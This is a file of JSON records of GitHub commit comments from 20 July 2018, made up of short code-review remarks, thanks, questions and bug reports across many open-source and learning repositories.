{"id":"7995883751","type":"CommitCommentEvent","actor":{"login":"pgray88"},"repo":{"name":"pgray88/FirstReactProject"},"payload":{"comment":{"id":29781481,"position":null,"line":null,"path":null,"commit_id":"9ffdc8455caea9259ba8e16c54ae63d2e88ec501","created_at":"2018-07-20T16:05:46Z","updated_at":"2018-07-20T16:05:46Z","author_association":"OWNER","body":"Install Node Modules\r\n"}},"created_at":"2018-07-20T16:05:46Z"}
{"id":"7995887000","type":"CommitCommentEvent","actor":{"login":"ixil"},"repo":{"name":"be5invis/Iosevka"},"payload":{"comment":{"id":29781490,"position":null,"line":null,"path":null,"commit_id":"e31de1b155abc28bf71901b4b2bc28cd3732cfba","created_at":"2018-07-20T16:06:24Z","updated_at":"2018-07-20T16:06:24Z","author_association":"NONE","body":"Is the omission of the pack zip iosevka-pack-2.0.0.zip on purpose?\r\nThanks for your work!"}},"created_at":"2018-07-20T16:06:24Z"}
{"id":"7995888984","type":"CommitCommentEvent","actor":{"login":"romainr"},"repo":{"name":"cloudera/hue"},"payload":{"comment":{"id":29781494,"position":5,"line":91,"path":"apps/beeswax/src/beeswax/server/dbms.py","commit_id":"d508358e07c6bc72de2d4a7fac50dfb8df3e395c","created_at":"2018-07-20T16:06:49Z","updated_at":"2018-07-20T16:06:49Z","author_association":"MEMBER","body":"On top of your head, any reason to use `name` and not beeswax here?\r\n\r\ncc\r\n@jdesjean "}},"created_at":"2018-07-20T16:06:49Z"}
{"id":"7995889332","type":"CommitCommentEvent","actor":{"login":"stefaweb"},"repo":{"name":"mailwatch/MailWatch"},"payload":{"comment":{"id":29781495,"position":null,"line":null,"path":null,"commit_id":"40d93c82e654ac801fb53eff442670e78ef5c232","created_at":"2018-07-20T16:06:53Z","updated_at":"2018-07-20T16:06:53Z","author_association":"CONTRIBUTOR","body":"A new problem. 😞\r\n\r\n![capture d ecran 2018-07-20 a 17 57 36](https://user-images.githubusercontent.com/12907102/43012896-972ccee6-8c47-11e8-8ff9-ac25f9bcfda7.png)\r\n"}},"created_at":"2018-07-20T16:06:53Z"}
{"id":"7995890001","type":"CommitCommentEvent","actor":{"login":"adarshk010"},"repo":{"name":"adarshk010/html"},"payload":{"comment":{"id":29781497,"position":null,"line":null,"path":null,"commit_id":"c932bf14e7c2bc9d8631460870d2dc51673bca45","created_at":"2018-07-20T16:07:02Z","updated_at":"2018-07-20T16:07:02Z","author_association":"OWNER","body":"hi this is adarsh i started learning html tody 20/7/19"}},"created_at":"2018-07-20T16:07:02Z"}
{"id":"7995890547","type":"CommitCommentEvent","actor":{"login":"marmarek"},"repo":{"name":"QubesOS/build-logs"},"payload":{"comment":{"id":29781498,"position":null,"line":null,"path":null,"commit_id":"27ecd8eae4b2d21c6c3ff57d54aac3325046d7f5","created_at":"2018-07-20T16:07:09Z","updated_at":"2018-07-20T16:07:09Z","author_association":"MEMBER","body":"I do see a successful upload here (and build in parent commit) @adrelanos. For some reason notification is missing."}},"created_at":"2018-07-20T16:07:09Z"}
{"id":"7995896047","type":"CommitCommentEvent","actor":{"login":"eduard-vasinskyi"},"repo":{"name":"softindex/datakernel"},"payload":{"comment":{"id":29781502,"position":null,"line":null,"path":null,"commit_id":"6db6a1da5f02b1313aee3698b59b8aaaed8fb84d","created_at":"2018-07-20T16:08:17Z","updated_at":"2018-07-20T16:08:17Z","author_association":"NONE","body":"![](https://github.trello.services/images/mini-trello-icon.png) [SerializerGenEnum - as varInt](https://trello.com/c/Tz50e5bf/178-serializergenenum-as-varint)"}},"created_at":"2018-07-20T16:08:17Z"}
{"id":"7995897003","type":"CommitCommentEvent","actor":{"login":"vrsttl"},"repo":{"name":"green-fox-academy/JudgeFudge911"},"payload":{"comment":{"id":29781505,"position":null,"line":null,"path":null,"commit_id":"72c8906db9718eabec7d438d1926a742ebe569c8","created_at":"2018-07-20T16:08:29Z","updated_at":"2018-07-20T16:08:29Z","author_association":"NONE","body":"Szep! Angular?"}},"created_at":"2018-07-20T16:08:29Z"}
{"id":"7995898820","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"noobpwnftw/Stockfish"},"payload":{"comment":{"id":29781508,"position":null,"line":null,"path":null,"commit_id":"3d55305d32b7b79e4d2adcef586960c1b72ceeb2","created_at":"2018-07-20T16:08:54Z","updated_at":"2018-07-20T16:08:54Z","author_association":"NONE","body":"A general hint for multi-threaded tests:\r\n- the Tc is normally reduced to 5+0.05 (STC) and 20+0.2 (LTC)\r\n- hash should be raised accordingly, so for 8 threads STC: hash=16 LTC hash=128 (we should use 256 MB but for big machines like your 384-core this could exceed the needed RAM, by the way: how many RAM has your monster machine?)."}},"created_at":"2018-07-20T16:08:54Z"}
{"id":"7995898923","type":"CommitCommentEvent","actor":{"login":"jamiew"},"repo":{"name":"jamiew/git-friendly"},"payload":{"comment":{"id":29781509,"position":null,"line":null,"path":null,"commit_id":"7b81d239bf5657fb9909cb2755bdd95c58b67b3f","created_at":"2018-07-20T16:08:55Z","updated_at":"2018-07-20T16:08:55Z","author_association":"OWNER","body":"fancy!"}},"created_at":"2018-07-20T16:08:55Z"}
{"id":"7995900516","type":"CommitCommentEvent","actor":{"login":"jamiew"},"repo":{"name":"jamiew/git-friendly"},"payload":{"comment":{"id":29781512,"position":null,"line":null,"path":null,"commit_id":"7b81d239bf5657fb9909cb2755bdd95c58b67b3f","created_at":"2018-07-20T16:09:17Z","updated_at":"2018-07-20T16:09:17Z","author_association":"OWNER","body":"is it worth adding some instructions to the README on how to update or generate this? New to me :)"}},"created_at":"2018-07-20T16:09:17Z"}
{"id":"7995902486","type":"CommitCommentEvent","actor":{"login":"ShaiberAlon"},"repo":{"name":"merenlab/web"},"payload":{"comment":{"id":29781517,"position":null,"line":null,"path":null,"commit_id":"7153a9521f0ccf4db690c3060d36e2571481428b","created_at":"2018-07-20T16:09:40Z","updated_at":"2018-07-20T16:09:40Z","author_association":"MEMBER","body":"Thanks for letting me know. I'll add a note for that."}},"created_at":"2018-07-20T16:09:40Z"}
{"id":"7995908458","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29781531,"position":null,"line":null,"path":null,"commit_id":"cd2d9088b551aae607bb5dc5254859a2cb006295","created_at":"2018-07-20T16:10:52Z","updated_at":"2018-07-20T16:10:52Z","author_association":"NONE","body":"@protonspring \r\nPlease use TC 5+0.05 not 10+0.1 because that is the quasi standard for multi-threaded STC tests."}},"created_at":"2018-07-20T16:10:52Z"}
{"id":"7995926064","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus-api"},"payload":{"comment":{"id":29781562,"position":25,"line":25,"path":"otus-center/src/main/java/org/ccem/otus/validators/FieldCenterValidator.java","commit_id":"9e513124a4a66a6ecd30adb89c53c2d3c41ac006","created_at":"2018-07-20T16:14:35Z","updated_at":"2018-07-20T16:14:35Z","author_association":"MEMBER","body":"A utilização de _ junto ao nome do método é utilizada somente no JavaScript, onde não existem modificadores de acesso. "}},"created_at":"2018-07-20T16:14:35Z"}
{"id":"7995927443","type":"CommitCommentEvent","actor":{"login":"stephinphection"},"repo":{"name":"fbu-team-awesome/social-maps"},"payload":{"comment":{"id":29781567,"position":68,"line":85,"path":"social-maps/View Controllers/ListViewController.m","commit_id":"887e82151402257117cdcf88ad0f269f3fd6dfe8","created_at":"2018-07-20T16:14:52Z","updated_at":"2018-07-20T16:14:52Z","author_association":"COLLABORATOR","body":"Don't forget to delete code that you're not using in the current commit :) "}},"created_at":"2018-07-20T16:14:52Z"}
{"id":"7995931273","type":"CommitCommentEvent","actor":{"login":"stephinphection"},"repo":{"name":"fbu-team-awesome/social-maps"},"payload":{"comment":{"id":29781577,"position":39,"line":56,"path":"social-maps/View Controllers/ListViewController.m","commit_id":"887e82151402257117cdcf88ad0f269f3fd6dfe8","created_at":"2018-07-20T16:15:40Z","updated_at":"2018-07-20T16:15:40Z","author_association":"COLLABORATOR","body":"A shortcut for this is CGRectGetWidth(self.view.frame);"}},"created_at":"2018-07-20T16:15:40Z"}
{"id":"7995936637","type":"CommitCommentEvent","actor":{"login":"AndrewJCallow"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29781586,"position":70,"line":54,"path":"contracts/Splitter.sol","commit_id":"aaaa66cb459d8ce34988b5c2b77863872d296942","created_at":"2018-07-20T16:16:48Z","updated_at":"2018-07-20T16:16:48Z","author_association":"OWNER","body":"Is this related to making a proper utility out of this because I'm not sure I understand the question, sorry :-("}},"created_at":"2018-07-20T16:16:48Z"}
{"id":"7995938047","type":"CommitCommentEvent","actor":{"login":"stephinphection"},"repo":{"name":"fbu-team-awesome/social-maps"},"payload":{"comment":{"id":29781587,"position":21,"line":21,"path":"social-maps/View Controllers/SearchViewController.m","commit_id":"3a0bcdd4bb544cf3b388677ade844c5099beff5f","created_at":"2018-07-20T16:17:06Z","updated_at":"2018-07-20T16:17:06Z","author_association":"COLLABORATOR","body":"it - delete the spaces between * and places, * and users"}},"created_at":"2018-07-20T16:17:06Z"}
{"id":"7995939112","type":"CommitCommentEvent","actor":{"login":"stephinphection"},"repo":{"name":"fbu-team-awesome/social-maps"},"payload":{"comment":{"id":29781588,"position":34,"line":34,"path":"social-maps/View Controllers/SearchViewController.m","commit_id":"3a0bcdd4bb544cf3b388677ade844c5099beff5f","created_at":"2018-07-20T16:17:19Z","updated_at":"2018-07-20T16:17:19Z","author_association":"COLLABORATOR","body":"Don't forget to delete code you're not using in the specific commit"}},"created_at":"2018-07-20T16:17:19Z"}
{"id":"7995944150","type":"CommitCommentEvent","actor":{"login":"stephinphection"},"repo":{"name":"fbu-team-awesome/social-maps"},"payload":{"comment":{"id":29781598,"position":32,"line":32,"path":"social-maps/social-maps/Views/RelationshipListCell.m","commit_id":"9543e9053ef736111b1768554b578427ba0590d4","created_at":"2018-07-20T16:18:26Z","updated_at":"2018-07-20T16:18:26Z","author_association":"COLLABORATOR","body":"Don't forget to take out code you're not using in this commit"}},"created_at":"2018-07-20T16:18:26Z"}
{"id":"7995948876","type":"CommitCommentEvent","actor":{"login":"Subhranil18"},"repo":{"name":"Subhranil18/ColorPicker"},"payload":{"comment":{"id":29781603,"position":null,"line":null,"path":null,"commit_id":"edc7d5ff74a835801a3379bd99ae16854c14d42d","created_at":"2018-07-20T16:19:20Z","updated_at":"2018-07-20T16:19:20Z","author_association":"OWNER","body":"ColorPicker application's html,css and script part."}},"created_at":"2018-07-20T16:19:20Z"}
{"id":"7995951980","type":"CommitCommentEvent","actor":{"login":"jdesjean"},"repo":{"name":"cloudera/hue"},"payload":{"comment":{"id":29781610,"position":5,"line":91,"path":"apps/beeswax/src/beeswax/server/dbms.py","commit_id":"d508358e07c6bc72de2d4a7fac50dfb8df3e395c","created_at":"2018-07-20T16:19:52Z","updated_at":"2018-07-20T16:19:52Z","author_association":"COLLABORATOR","body":"I'm thinking if sentry adds some security concepts in the future for another service (e.g. streaming) we will probably need to revisit here. Unfortunately, I couldn't quite test the the multi cluster so you'll have to check that from that aspect."}},"created_at":"2018-07-20T16:19:52Z"}
{"id":"7995952041","type":"CommitCommentEvent","actor":{"login":"stephinphection"},"repo":{"name":"fbu-team-awesome/social-maps"},"payload":{"comment":{"id":29781611,"position":4,"line":17,"path":"social-maps/View Controllers/ListViewController.m","commit_id":"0788c3a5de08b2a9383313914f8244885587aab3","created_at":"2018-07-20T16:19:53Z","updated_at":"2018-07-20T16:19:53Z","author_association":"COLLABORATOR","body":"Let's put this below the list of properties to keep things logically grouped :) "}},"created_at":"2018-07-20T16:19:53Z"}
{"id":"7995953498","type":"CommitCommentEvent","actor":{"login":"stephinphection"},"repo":{"name":"fbu-team-awesome/social-maps"},"payload":{"comment":{"id":29781613,"position":12,"line":62,"path":"social-maps/View Controllers/ListViewController.m","commit_id":"0788c3a5de08b2a9383313914f8244885587aab3","created_at":"2018-07-20T16:20:09Z","updated_at":"2018-07-20T16:20:09Z","author_association":"COLLABORATOR","body":"thank you for cleaning up spacing as you go! awesome!"}},"created_at":"2018-07-20T16:20:09Z"}
{"id":"7995955671","type":"CommitCommentEvent","actor":{"login":"stephinphection"},"repo":{"name":"fbu-team-awesome/social-maps"},"payload":{"comment":{"id":29781617,"position":4,"line":14,"path":"social-maps/View Controllers/SearchResultsViewController.m","commit_id":"002ab888958ac59e3ca36d374312df5fc4ae8fe1","created_at":"2018-07-20T16:20:35Z","updated_at":"2018-07-20T16:20:35Z","author_association":"COLLABORATOR","body":"nit don't forget to remove extra whitespace before submitting :) "}},"created_at":"2018-07-20T16:20:35Z"}
{"id":"7995956323","type":"CommitCommentEvent","actor":{"login":"stephinphection"},"repo":{"name":"fbu-team-awesome/social-maps"},"payload":{"comment":{"id":29781620,"position":12,"line":32,"path":"social-maps/View Controllers/SearchResultsViewController.m","commit_id":"002ab888958ac59e3ca36d374312df5fc4ae8fe1","created_at":"2018-07-20T16:20:44Z","updated_at":"2018-07-20T16:20:44Z","author_association":"COLLABORATOR","body":"great job implementing this!!!"}},"created_at":"2018-07-20T16:20:44Z"}
{"id":"7995966538","type":"CommitCommentEvent","actor":{"login":"AndrewJCallow"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29781639,"position":18,"line":22,"path":"test/tests.js","commit_id":"1baa84ad9a7c19b0827d266122ce806306cb53cb","created_at":"2018-07-20T16:22:58Z","updated_at":"2018-07-20T16:22:58Z","author_association":"OWNER","body":"ty very much for spotting the lack of ()=>, and you're right about the ordering. there is no need."}},"created_at":"2018-07-20T16:22:58Z"}
{"id":"7995998387","type":"CommitCommentEvent","actor":{"login":"knrc"},"repo":{"name":"openshift-istio/openshift-ansible"},"payload":{"comment":{"id":29781705,"position":4,"line":8,"path":"roles/openshift_istio/defaults/main.yml","commit_id":"15a3580585979ce93d3096e9c444f7875b82dc53","created_at":"2018-07-20T16:29:22Z","updated_at":"2018-07-20T16:29:22Z","author_association":"NONE","body":"This is the value in the yaml file"}},"created_at":"2018-07-20T16:29:22Z"}
{"id":"7995999857","type":"CommitCommentEvent","actor":{"login":"romainr"},"repo":{"name":"cloudera/hue"},"payload":{"comment":{"id":29781711,"position":5,"line":91,"path":"apps/beeswax/src/beeswax/server/dbms.py","commit_id":"d508358e07c6bc72de2d4a7fac50dfb8df3e395c","created_at":"2018-07-20T16:29:41Z","updated_at":"2018-07-20T16:29:41Z","author_association":"MEMBER","body":"And 'beeswax' feel right, as this is the name of the underlying Thrift API"}},"created_at":"2018-07-20T16:29:41Z"}
{"id":"7996000948","type":"CommitCommentEvent","actor":{"login":"1271"},"repo":{"name":"yuru-yuri/vk-audio-url-decoder-php"},"payload":{"comment":{"id":29781714,"position":null,"line":null,"path":null,"commit_id":"02e71c668d88aba654b93354f5df26251dfdadda","created_at":"2018-07-20T16:29:56Z","updated_at":"2018-07-20T16:29:56Z","author_association":"MEMBER","body":"#3"}},"created_at":"2018-07-20T16:29:56Z"}
{"id":"7996003046","type":"CommitCommentEvent","actor":{"login":"limichelle21"},"repo":{"name":"limichelle21/meal-planner"},"payload":{"comment":{"id":29781723,"position":7,"line":9,"path":"app/controllers/recipes_controller.rb","commit_id":"622e02d9bfb991acad3a5331ffa76f4cf1c47340","created_at":"2018-07-20T16:30:22Z","updated_at":"2018-07-20T16:30:22Z","author_association":"OWNER","body":"review rails many to many \r\n\r\nsearch for the ingredient first, set it as an ingredient instant variable\r\nIngredient.where()\r\n@Ingredient.recipes"}},"created_at":"2018-07-20T16:30:22Z"}
{"id":"7996014319","type":"CommitCommentEvent","actor":{"login":"xhub"},"repo":{"name":"siconos/siconos"},"payload":{"comment":{"id":29781753,"position":64,"line":621,"path":"numerics/src/tools/NumericsMatrix.h","commit_id":"2f775ba8590d5dd12b4afdef9a4921a138c32e81","created_at":"2018-07-20T16:32:50Z","updated_at":"2018-07-20T16:32:50Z","author_association":"MEMBER","body":"sizeof_elt is not initialized\r\n"}},"created_at":"2018-07-20T16:32:50Z"}
{"id":"7996016297","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29781759,"position":null,"line":null,"path":null,"commit_id":"74bc15fcf31878278cb8f8281a1bbde843e6ae1c","created_at":"2018-07-20T16:33:16Z","updated_at":"2018-07-20T16:33:16Z","author_association":"COLLABORATOR","body":"It would be nice to perform the same process with regex(3) code fuzzing, that is stored inside other programs in base (grep, cvs etc), and regex(3) implementations in GNU/Linux, FreeBSD, OpenBSD and compare to make the bigger picture."}},"created_at":"2018-07-20T16:33:16Z"}
{"id":"7996019657","type":"CommitCommentEvent","actor":{"login":"jurec72"},"repo":{"name":"jurec72/JavaCodes"},"payload":{"comment":{"id":29781770,"position":null,"line":null,"path":null,"commit_id":"14d6c352d62377d18e97f3413a63da46abe521da","created_at":"2018-07-20T16:34:03Z","updated_at":"2018-07-20T16:34:03Z","author_association":"OWNER","body":"d"}},"created_at":"2018-07-20T16:34:03Z"}
{"id":"7996021254","type":"CommitCommentEvent","actor":{"login":"be5invis"},"repo":{"name":"be5invis/Iosevka"},"payload":{"comment":{"id":29781773,"position":null,"line":null,"path":null,"commit_id":"e31de1b155abc28bf71901b4b2bc28cd3732cfba","created_at":"2018-07-20T16:34:23Z","updated_at":"2018-07-20T16:34:23Z","author_association":"OWNER","body":"`iosevka-pack` has been broken into `ttc-iosevka` and `ttc-iosevka-slab`."}},"created_at":"2018-07-20T16:34:23Z"}
{"id":"7996021697","type":"CommitCommentEvent","actor":{"login":"sgrossberndt"},"repo":{"name":"fabarea/metadata"},"payload":{"comment":{"id":29781775,"position":null,"line":null,"path":null,"commit_id":"a4d4b66eb9f4b950e017d6d5d442e222d74e897a","created_at":"2018-07-20T16:34:29Z","updated_at":"2018-07-20T16:34:29Z","author_association":"CONTRIBUTOR","body":"Thank you! :-)"}},"created_at":"2018-07-20T16:34:29Z"}
{"id":"7996022162","type":"CommitCommentEvent","actor":{"login":"PREMjITHT"},"repo":{"name":"embeddedarm/linux-3.10.17-imx6"},"payload":{"comment":{"id":29781777,"position":4,"line":3,"path":"drivers/net/wireless/atmel/wilc3000/Kconfig","commit_id":"e43e3567cc1f0cf373abc40c60dd144bbc92df2d","created_at":"2018-07-20T16:34:35Z","updated_at":"2018-07-20T16:34:35Z","author_association":"NONE","body":"Ok, Thank u\r\n"}},"created_at":"2018-07-20T16:34:35Z"}
{"id":"7996025694","type":"CommitCommentEvent","actor":{"login":"eleith"},"repo":{"name":"firebase/firebase-functions"},"payload":{"comment":{"id":29781782,"position":4,"line":3,"path":"package.json","commit_id":"01665efef3f0ad8fe5041417e51c1f6f23f52b51","created_at":"2018-07-20T16:35:21Z","updated_at":"2018-07-20T16:35:21Z","author_association":"NONE","body":"the version got downgraded with this commit"}},"created_at":"2018-07-20T16:35:21Z"}
{"id":"7996027638","type":"CommitCommentEvent","actor":{"login":"xhub"},"repo":{"name":"siconos/siconos"},"payload":{"comment":{"id":29781785,"position":5,"line":42,"path":"numerics/src/tools/NumericsMatrix.h","commit_id":"2f775ba8590d5dd12b4afdef9a4921a138c32e81","created_at":"2018-07-20T16:35:45Z","updated_at":"2018-07-20T16:35:45Z","author_association":"MEMBER","body":"The description seems no longer accurate:\r\n- iWorkSize is the length of the integer array iWork\r\n- sizeof_elt is the size of the integer in the array iWork\r\n\r\nI believe that sizeof_int or iSize would be a better name rather than  sizeof_elt"}},"created_at":"2018-07-20T16:35:45Z"}
{"id":"7996030414","type":"CommitCommentEvent","actor":{"login":"disassembler"},"repo":{"name":"input-output-hk/iohk-ops"},"payload":{"comment":{"id":29781789,"position":5,"line":857,"path":"iohk/NixOps.hs","commit_id":"8993c482671fec576167ae634c00eb9b428a1ee8","created_at":"2018-07-20T16:36:23Z","updated_at":"2018-07-20T16:36:23Z","author_association":"CONTRIBUTOR","body":":heart: "}},"created_at":"2018-07-20T16:36:23Z"}
{"id":"7996037166","type":"CommitCommentEvent","actor":{"login":"mcdave"},"repo":{"name":"tasugo/activities"},"payload":{"comment":{"id":29781799,"position":null,"line":null,"path":null,"commit_id":"09078f44aa66afe996a5d906cc2a76265060bf0b","created_at":"2018-07-20T16:37:49Z","updated_at":"2018-07-20T16:37:49Z","author_association":"NONE","body":"👏 "}},"created_at":"2018-07-20T16:37:49Z"}
{"id":"7996037674","type":"CommitCommentEvent","actor":{"login":"StefanAmur"},"repo":{"name":"StefanAmur/CSS-Natours-Project"},"payload":{"comment":{"id":29781800,"position":null,"line":null,"path":null,"commit_id":"50057cb341f5c862b2556e8b84bf9da54bc9a841","created_at":"2018-07-20T16:37:54Z","updated_at":"2018-07-20T16:37:54Z","author_association":"OWNER","body":"Deleted useless file"}},"created_at":"2018-07-20T16:37:54Z"}
{"id":"7996039277","type":"CommitCommentEvent","actor":{"login":"xhub"},"repo":{"name":"siconos/siconos"},"payload":{"comment":{"id":29781805,"position":null,"line":null,"path":null,"commit_id":"2f775ba8590d5dd12b4afdef9a4921a138c32e81","created_at":"2018-07-20T16:38:15Z","updated_at":"2018-07-20T16:38:15Z","author_association":"MEMBER","body":"This commit introduce segfault, see https://cdash-tripop.inrialpes.fr/viewTest.php?onlyfailed&buildid=306"}},"created_at":"2018-07-20T16:38:15Z"}
{"id":"7996048141","type":"CommitCommentEvent","actor":{"login":"ynaessens"},"repo":{"name":"JeromeDevome/GRR"},"payload":{"comment":{"id":29781824,"position":null,"line":null,"path":null,"commit_id":"23e669a57e210536e1f3a11dae71792233866c6b","created_at":"2018-07-20T16:40:19Z","updated_at":"2018-07-20T16:40:19Z","author_association":"COLLABORATOR","body":"première étape dans la remise à plat du calcul de l'apparence des pages...\r\nles feuilles de style sont désormais chargées dans l'ordre \"logique\": les feuilles personnelles sont chargées en dernier, elles imposent donc leurs règles ;\r\nles anciens thèmes sont pour l'heure cassés ;\r\nun nouveau thème \"defaut\" utilise un nombre réduit de règles, ce sont celles du bootstrap qui s'appliquent par défaut ;\r\nla version de bootstrap utilisée est 3.3.7.\r\nLes remarques et suggestions sont bienvenues !"}},"created_at":"2018-07-20T16:40:19Z"}
{"id":"7996052230","type":"CommitCommentEvent","actor":{"login":"PREMjITHT"},"repo":{"name":"embeddedarm/linux-3.10.17-imx6"},"payload":{"comment":{"id":29781833,"position":null,"line":null,"path":null,"commit_id":"4490c20658c9a591151d089b47c1c1a8c2c7d429","created_at":"2018-07-20T16:41:15Z","updated_at":"2018-07-20T16:41:15Z","author_association":"NONE","body":"oh, that's cool., \r\nI am using SDIO for WiFi , so i got that error...,"}},"created_at":"2018-07-20T16:41:15Z"}
{"id":"7996057321","type":"CommitCommentEvent","actor":{"login":"lrennels"},"repo":{"name":"lrennels/fund"},"payload":{"comment":{"id":29781841,"position":null,"line":null,"path":null,"commit_id":"ded0ef74e6da84ffae0b10c080c9a57684f06268","created_at":"2018-07-20T16:42:26Z","updated_at":"2018-07-20T16:42:26Z","author_association":"OWNER","body":"@ckingdon95 strange, when I run:\r\n\r\n```\r\ninclude(\"../src/fund.jl\")\r\nusing fund\r\nm = FUND\r\nrun(m)\r\n``` \r\n\r\nI get no errors"}},"created_at":"2018-07-20T16:42:26Z"}
{"id":"7996058329","type":"CommitCommentEvent","actor":{"login":"OliviaBranch"},"repo":{"name":"OliviaBranch/react-native"},"payload":{"comment":{"id":29781844,"position":6,"line":10,"path":"setupBabel.js","commit_id":"dbfb99f9cb906cddd3d86f1e78118e930c8fbb24","created_at":"2018-07-20T16:42:40Z","updated_at":"2018-07-20T16:42:40Z","author_association":"OWNER","body":"xecdrfvtgbko,l.pfgbyhnujmik,ol.p;/["}},"created_at":"2018-07-20T16:42:40Z"}
{"id":"7996058534","type":"CommitCommentEvent","actor":{"login":"AndyGrant"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29781845,"position":null,"line":null,"path":null,"commit_id":"a3244a621c5a0608d0897ea606a09dd662c96daa","created_at":"2018-07-20T16:42:42Z","updated_at":"2018-07-20T16:42:42Z","author_association":"NONE","body":"You won't get anyone to agree to remove this. Also, it will pass, because barring a surprise mate in N, this condition will never trigger before normal adjudication. "}},"created_at":"2018-07-20T16:42:42Z"}
{"id":"7996058601","type":"CommitCommentEvent","actor":{"login":"Ernesto7426"},"repo":{"name":"Ernesto7426/udemy-heroes-2"},"payload":{"comment":{"id":29781847,"position":null,"line":null,"path":null,"commit_id":"8dc216379cc3eb94c32be0756abac7563f3e88f9","created_at":"2018-07-20T16:42:43Z","updated_at":"2018-07-20T16:42:43Z","author_association":"OWNER","body":"Perfecto!, los cambios funcionaron :mushroom:  "}},"created_at":"2018-07-20T16:42:43Z"}
{"id":"7996060424","type":"CommitCommentEvent","actor":{"login":"Ernesto7426"},"repo":{"name":"Ernesto7426/udemy-heroes-2"},"payload":{"comment":{"id":29781852,"position":null,"line":null,"path":null,"commit_id":"8dc216379cc3eb94c32be0756abac7563f3e88f9","created_at":"2018-07-20T16:43:08Z","updated_at":"2018-07-20T16:43:08Z","author_association":"OWNER","body":"### Probando Markdown\r\nTodo funciona"}},"created_at":"2018-07-20T16:43:08Z"}
{"id":"7996062015","type":"CommitCommentEvent","actor":{"login":"MiguelContreras69"},"repo":{"name":"MiguelContreras69/proyectogitudemy"},"payload":{"comment":{"id":29781854,"position":null,"line":null,"path":null,"commit_id":"c86e5bb55ffd4f00e8adacd4f5e2987d1d4f4a2f","created_at":"2018-07-20T16:43:30Z","updated_at":"2018-07-20T16:43:30Z","author_association":"OWNER","body":"prueba del emoticon 💯 🇲🇽 "}},"created_at":"2018-07-20T16:43:30Z"}
{"id":"7996064261","type":"CommitCommentEvent","actor":{"login":"dfinke"},"repo":{"name":"dfinke/NameIT"},"payload":{"comment":{"id":29781858,"position":null,"line":null,"path":null,"commit_id":"83f3ef73a5df6ec71d6a77c4e0ca794ae655547f","created_at":"2018-07-20T16:43:59Z","updated_at":"2018-07-20T16:43:59Z","author_association":"OWNER","body":"PRs always welcome. Be cool to hear how you're  using it. Blog or tweet or post it here and I can write it up."}},"created_at":"2018-07-20T16:43:59Z"}
{"id":"7996065876","type":"CommitCommentEvent","actor":{"login":"targos"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":29781861,"position":null,"line":null,"path":null,"commit_id":"5e5ffc81fa823221777ab7c9fed33093afdfa876","created_at":"2018-07-20T16:44:21Z","updated_at":"2018-07-20T16:44:21Z","author_association":"MEMBER","body":"PR-URL: https://github.com/nodejs/node/pull/21850"}},"created_at":"2018-07-20T16:44:21Z"}
{"id":"7996066251","type":"CommitCommentEvent","actor":{"login":"StupidDan"},"repo":{"name":"StupidDan/BloxBot"},"payload":{"comment":{"id":29781864,"position":null,"line":null,"path":null,"commit_id":"4507bd15b2a7e08d070b278765bd42c60725a24e","created_at":"2018-07-20T16:44:26Z","updated_at":"2018-07-20T16:44:26Z","author_association":"OWNER","body":"(also unmute command added)"}},"created_at":"2018-07-20T16:44:26Z"}
{"id":"7996067208","type":"CommitCommentEvent","actor":{"login":"rafaeelaudibert"},"repo":{"name":"mgfzemor/piubs_apoio"},"payload":{"comment":{"id":29781868,"position":null,"line":null,"path":null,"commit_id":"4707167dd015b63f7e67bbe4d2bc722003ec9d07","created_at":"2018-07-20T16:44:39Z","updated_at":"2018-07-20T16:44:39Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Pull Request #4](https://trello.com/c/Jnhkuogh/8-pull-request-4)"}},"created_at":"2018-07-20T16:44:39Z"}
{"id":"7996069566","type":"CommitCommentEvent","actor":{"login":"desolat"},"repo":{"name":"fabioz/PyDev.Debugger"},"payload":{"comment":{"id":29781879,"position":150,"line":159,"path":"pydevd_file_utils.py","commit_id":"5e16420ced9df6f32b39c570e8dd40359312b085","created_at":"2018-07-20T16:45:11Z","updated_at":"2018-07-20T16:45:11Z","author_association":"NONE","body":"@fabioz _ide_os will be set wrong here when remote-debugging and executing on Linux and IDE is on Windows. Then the wrong eclipse_sep will be set (see Line 352) and path translation will fail. "}},"created_at":"2018-07-20T16:45:11Z"}
{"id":"7996074497","type":"CommitCommentEvent","actor":{"login":"drdanz"},"repo":{"name":"robotology/yarp"},"payload":{"comment":{"id":29781888,"position":5,"line":5,"path":"bindings/lua/tests/test_vocab.lua","commit_id":"7aa99d95eb5f3f2b6692aced7afa1732a1cd467c","created_at":"2018-07-20T16:46:16Z","updated_at":"2018-07-20T16:46:16Z","author_association":"MEMBER","body":"@jgvictores Thanks a lot!"}},"created_at":"2018-07-20T16:46:16Z"}
{"id":"7996078901","type":"CommitCommentEvent","actor":{"login":"noskill"},"repo":{"name":"noskill/atomspace"},"payload":{"comment":{"id":29781910,"position":null,"line":null,"path":null,"commit_id":"707722f5760f94f23031c3948e0e1289b6b37897","created_at":"2018-07-20T16:47:16Z","updated_at":"2018-07-20T16:47:16Z","author_association":"OWNER","body":"Thanks!\r\nI'll take care of it."}},"created_at":"2018-07-20T16:47:16Z"}
{"id":"7996082753","type":"CommitCommentEvent","actor":{"login":"gcttong"},"repo":{"name":"phac-nml/biohansel"},"payload":{"comment":{"id":29781922,"position":43,"line":31,"path":"bio_hansel/scripts/write_sequence.py","commit_id":"3a135f21c95bf2e361a9fb25f117dbe81d724875","created_at":"2018-07-20T16:48:06Z","updated_at":"2018-07-20T16:48:06Z","author_association":"COLLABORATOR","body":"yes this has been addressed in commit 65e9e1d93bf0b70bf3970da7ac1f197c2c174129"}},"created_at":"2018-07-20T16:48:06Z"}
